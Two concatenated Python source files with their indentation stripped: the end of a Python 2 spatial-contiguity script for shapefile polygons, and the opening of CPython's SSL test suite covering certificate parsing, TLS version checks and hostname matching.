if shpFileObject.type != ps.cg.Polygon:
break
t2 = time.time()
print "Checking the geometry took {} seconds".format(t2-t1)
t1 = time.time()
shapebox = shpFileObject.bbox # bounding box
numPoly = len(shpFileObject)
t2 = time.time()
print "Getting the BBox and length took {} seconds".format(t2-t1)
t1 = time.time()
t3 = time.time()
ranseq = sorted([randint(0,numPoly) for r in xrange(5)])
geomx = []
geomy = []
bboxes = np.empty((numPoly, 4))
pieces = 0
total_perim = 0
lens = np.empty(numPoly)
t4 = time.time()
for g in xrange(numPoly):
shpobj = shpFileObject.get(g)
x, y = zip(*shpobj.vertices)
geomx += x
geomy += y
lens[g] = shpobj.len
bboxes[g][:] = shpobj.bounding_box[:] #Add 0.3 seconds for 5625 super inefficient!
if g in ranseq:
pieces += lens[g] - 1
total_perim += shpobj.perimeter
cellsize = total_perim / pieces * 1.
        cellsize *= 2  # This needs to be tested: is a cell size of l better or l*c?
geoms = np.empty((2, len(geomx)))
geoms[0] = geomx
geoms[1] = geomy
del geomx, geomy
t2 = time.time()
print "***THIS IS ALL READ TIME***"
print "Flattening vertices and cellsize computation required {} seconds".format(t2 - t1)
print " Within this {} seconds were used for allocation".format(t4-t3)
print "***DONE READING***"
print "Processing with a cell size of {} units".format(cellsize)
t1 = time.time()
xdimension = abs(int((shapebox[2] - shapebox[0]) / cellsize))
ydimension = abs(int((shapebox[3] - shapebox[1]) / cellsize))
#Partition the space into a regular grid
xmesh = np.linspace(shapebox[0], shapebox[2], xdimension)
ymesh = np.linspace(shapebox[1], shapebox[3], ydimension)
xv, yv = np.meshgrid(xmesh,ymesh)
memship = np.empty((numPoly, 5), dtype=np.int)
#Intersect the BBoxes with the meshgrid
memship[:,2] = np.searchsorted(yv[:,0], bboxes[:,1], side='left')
memship[:,3] = np.searchsorted(yv[:,0], bboxes[:,3], side='left')
memship[:,0] = np.searchsorted(xv[0], bboxes[:,0], side='left')
memship[:,1] = np.searchsorted(xv[0], bboxes[:,2], side='left')
#Fix floating point inaccuracies, i.e. all the 0s and all the max + 1 values
ystart = memship[:,2]
ystart[ystart == 0] = 1
xstart = memship[:,0]
xstart[xstart == 0] = 1
ystop = memship[:,3]
ystop[ystop == len(yv[:,0] + 1)] = len(yv[:,0])
xstop = memship[:,1]
xstop[xstop == len(xv[0]) + 1] = len(xv[0])
#Add the keys
memship[:,4] = indices = np.arange(len(bboxes))
#Lexicographical sort on xstart, ystart, xend, yend
ind = np.lexsort((memship[:,0], memship[:,2], memship[:,1], memship[:,3]))
sortmem = memship[ind]
t2 = time.time()
print "Getting buckets and generating data structure took {} seconds.".format(t2-t1)
t1 = time.time()
potential_neighbors = {}
#Can this be vectorized or use itertools?
for i in xrange(1, len(xv[0])):
            stepback = {}  # A list of x and y crossers that we need to decrement x for
crosseridx = np.where((sortmem[:,0]==i) & (sortmem[:,1]!=sortmem[:,0]))
crosseridy = np.where((sortmem[:,0]==i)\
& (sortmem[:,2]!=sortmem[:,3])\
& (sortmem[:,1]!=sortmem[:,0]))
yrollback = sortmem[crosseridy, 2]
for j in xrange(1, len(yv[:,0])):
#Step over all y cells in the x column
yidx = np.logical_and(sortmem[:,0] == i, sortmem[:,2] == j)
if len(sortmem[yidx, -1]) > 0:
potential_neighbors[(i,j)] = sortmem[yidx, -1]
#Same idea as below, but with all j in this i - using bitwise operators
# should be safe as arrays are all boolean checks.
idx = np.where((sortmem[:,2]==j) & (sortmem[:,2]!=sortmem[:,3]) & (sortmem[:,0]==i))
sortmem[idx,2] = (j + 1)
#We know that all the values are sorted, so if start != end, increment
# start until it start == end. Then the poly is added to all
# row / column pairs between start and end.
sortmem[crosseridx, 0] = (i + 1)
#Rollback the y crossers for the new x.
sortmem[crosseridy,2] = yrollback
t2 = time.time()
print "Extracting vectors to polygon membership lists too {} seconds".format(t2-t1)
t1 = time.time()
#Can I get a vertex count from a shapefile header?
# If so no need for lists to arrays, just allocate and pack.
cgeoms = mp.RawArray(ctypes.c_double, geoms.size)
npgeoms = np.frombuffer(cgeoms)
npgeoms.shape = (2, geoms.shape[1])
npgeoms[:] = geoms
coffsets = mp.RawArray(ctypes.c_int, lens.size * 2)
npoffsets = np.frombuffer(coffsets)
npoffsets[:] = np.cumsum(lens)
contmatrix = mp.RawArray(ctypes.c_int, (lens.size * lens.size * 2))
npcontmatrix = np.frombuffer(contmatrix)
npcontmatrix.shape = (lens.size, lens.size)
npcontmatrix[:] = 0
global_pointers(cgeoms, coffsets, contmatrix)
t2 = time.time()
print "Creating ctype shared memory vertices took {} seconds".format(t2-t1)
'''
t1 = time.time()
cores = mp.cpu_count()
pool = mp.Pool(cores)
t2 = time.time()
print "Initializing the pool of workers took {} seconds".format(t2 - t1)
'''
t1 = time.time()
#We don't care what 'cell' polys are in, only that they
# might be neighbors.
neighbor_checks = [v for v in potential_neighbors.itervalues()]
starts = range(0,len(neighbor_checks), len(neighbor_checks) / cores)
stops = starts[1:]
if len(stops) == 1:
stops.append(len(neighbor_checks))
offsets = [ range(z[0],z[1]) for z in zip(starts, stops)]
t2 = time.time()
print "Computing decomposition took {} seconds".format(t2-t1)
t1 = time.time()
jobs = []
lock = mp.Lock()
for offset in offsets:
checks = [neighbor_checks[j] for j in offset]
job = mp.Process(target=check_contiguity, args=(checks,lock, 'ROOK'))
jobs.append(job)
for job in jobs:
job.start()
for job in jobs:
job.join()
t2 = time.time()
print "Multicore contiguity check took {} seconds".format(t2-t1)
t1 = time.time()
w = {}
        nonzero = np.transpose(np.nonzero(npcontmatrix))
for i in range(numPoly):
neigh = nonzero[nonzero[:,0] == i]
w[i] = neigh[:,1].tolist()
t2 = time.time()
print "Generating a W from a sparse matrix took {} seconds".format(t2-t1)
tb = time.time()
print "Total processing time was {} seconds".format(tb-ta)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
        # Assume that any reference to "ubuntu" implies an Ubuntu-like distro.
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
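# Illustrative sketch (editor addition, not part of the original suite):
# the decorator converts a missing TLS version into a SkipTest rather than
# a failure, so version-specific tests degrade gracefully.
class _ExampleRequiresTLSVersion(unittest.TestCase):
    @requires_tls_version('TLSv1_3')
    def test_tls13_available_when_not_skipped(self):
        # Only reached when TLS 1.3 is available in this build/config.
        self.assertTrue(has_tls_version('TLSv1_3'))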
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
if major >= 3:
# 3.x uses 0xMNN00PP0L
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{patch:d}"
else:
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'ssl.{protocol.name} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!s} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# A partial wildcard in the first fragment is no longer supported, even
# with IDNA A-labels in subsequent fragments: all of these fail.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
